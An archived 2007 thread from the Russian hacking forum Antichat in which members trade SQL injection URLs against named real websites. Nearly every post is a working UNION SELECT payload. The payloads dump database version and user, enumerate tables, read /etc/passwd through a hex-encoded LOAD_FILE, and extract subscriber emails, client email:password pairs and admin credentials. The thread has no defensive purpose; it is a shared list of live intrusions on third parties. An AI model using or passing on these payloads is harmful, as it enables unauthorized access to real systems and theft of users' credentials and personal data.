ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

04.04.2007, 17:56
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Код:
http://bila.com.ua/price_view.php?price_id=-1+union+select+1,2,3,4,5,6,7,concat(database(),char(58),user(),char(58),version()),9,10,11,12,13,14/*
|
|
|

04.04.2007, 18:45
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме: 4836047
Репутация:
930
|
|
Сообщение от Grey
Код:
http://bila.com.ua/price_view.php?price_id=-1+union+select+1,2,3,4,5,6,7,concat(database(),char(58),user(),char(58),version()),9,10,11,12,13,14/*
бгг =)
Код:
http://bila.com.ua/price_list.php?searchtype=33&searchsub=-1+union+select+1,2,version()/*
www.f1-world.ru
5 мускуль
Код:
http://www.f1-world.ru/news/news.php3?idnews=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Последний раз редактировалось Ksander; 04.04.2007 в 19:31..
|
|
|

04.04.2007, 19:33
|
|
Познающий
Регистрация: 30.12.2006
Сообщений: 32
Провел на форуме: 383436
Репутация:
68
|
|
Код:
http://www.fpp-iis.ru/iss.php?page=-1+union+select+1,2,3,4,5,6/*
Возможно ли что-нибудь дальше?
|
|
|

04.04.2007, 19:49
|
|
Участник форума
Регистрация: 08.09.2006
Сообщений: 194
Провел на форуме: 1627025
Репутация:
163
|
|
Сообщение от XenOtai
Код:
http://www.fpp-iis.ru/iss.php?page=-1+union+select+1,2,3,4,5,6/*
Возможно ли что-нибудь дальше?
для mysql.user запрос не прокатил... может быть есть другая база данных...
SELECT command denied to user 'tib_ips'@'xxx.xxx.xxx.xxx' for table 'user'
|
|
|

04.04.2007, 18:02
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме: 7192869
Репутация:
3033
|
|
Код:
http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-89+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(char(58),version(),user(),database()),16,17,18,19,20,21,22,23/*&mode=chrono&order=0
Вывод в тайтле( сам чуть не прозевал=\)
Код:
http://www.michaeljfox.org/news/article.php?id=-5+union+select+convert(concat_ws(char(58),version(),user(),database())+using+latin1)/*
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|

04.04.2007, 19:56
|
|
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме: 7910701
Репутация:
811
|
|
http://www.f1-world.ru/news/news.php3?idnews=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+fr om+information_schema.tables+limit+40,1/*
пока еду дальше
http://www.f1-world.ru/news/news.php3?idnews=-1+union+select+1,column_name,3,4,5,6,7,8,9,10,11+f rom+information_schema.columns+where+table_name=ch ar(120,95,111,114,100,101,114,115)+limit+19,1/*
заипался
Последний раз редактировалось alextoun; 04.04.2007 в 20:59..
|
|
|

04.04.2007, 20:53
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Код:
http://www.interfax-religion.ru/?act=news&div=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10,11,12,13/*
http://www.interfax-religion.ru/?act=news&div=-1+union+select+concat(id,char(58),email),2,3,4,5,6,7,8,9,10,11,12,13+from+subscribe+limit+0,1/*
Код:
http://askbook.kiev.ua/books.php?book=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15/*
|
|
|

04.04.2007, 21:27
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме: 1654589
Репутация:
337
|
|
LOAD_FILE('etc/passwd') проходит, но выдает путой результат ^_____^
На загрузку файлов не проверял.
На ошибки внимания не обращаем, имена файлов берутся из базы, поэтому ругает за отсутсвие.
http://www.produktonline.ru/list.php?link=2166+union+select+1,2,3,4,version(), 6,7,8,9,10,11,12,13,14,15,16,17,18,LOAD_FILE(0x2f6 574632f706173737764),20,21,22,23,24,25,26,27
|
|
|

04.04.2007, 21:47
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме: 2924346
Репутация:
1719
|
|
Код:
http://www.di-do.ru/index.php?all=1&c1=-1+union+select+1,concat(email,0x3a,pass),3,4+from+clients/*
|
|
|

04.04.2007, 21:57
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме: 2132613
Репутация:
1365
|
|
compoundsemi.com
Код:
http://compoundsemi.com/documents/view/generic.php?id=-6913/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(name,0x3a,password),18+from+admin+limit+2,1/*
C пасами жопа =\
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|